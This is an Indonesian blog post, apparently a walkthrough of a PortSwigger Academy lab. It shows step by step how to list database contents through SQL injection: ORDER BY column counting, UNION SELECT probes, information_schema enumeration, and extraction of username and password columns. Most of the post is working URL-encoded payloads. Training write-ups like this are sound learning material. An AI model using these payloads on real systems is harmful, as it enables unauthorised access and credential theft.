Portswigger academy SQLi Lab: SQL injection attack, listing the database contents on non-Oracle databases
Kali ini kita akan mengambil isi database dari kerentanan SQL injection. Akan menggunakan beberapa trik dan payload yang sebelumnya.
Gunakan ' untuk melihat kerentanannya. Selanjutnya jika sudah error, tulis payload:
'order+by+1--
'order+by+2--
'order+by+3-- (error di 3, jumlah kolom ada 2)
Selanjutnya ketik:
'union+select+NULL,NULL--
'union+select+'a','a'--
Keduanya bisa mengembalikan string.
Ambil muatan tabel pada databasenya menggunakan:
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
muncul list diatas, pilih yang berkaitan dengan username, akun atau pasword.
saya memilih:
users_dncaie
selanjutnya masukkan payload:
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_dncaie'--
Akan muncul yang berhubungan dengan credential seperti username dan password:
username_eygvsy
password_dtvays
Masukkan ke dalam payload:
'+UNION+SELECT+username_eygvsy,+password_dtvays+FROM+users_dncaie--



Komentar
Posting Komentar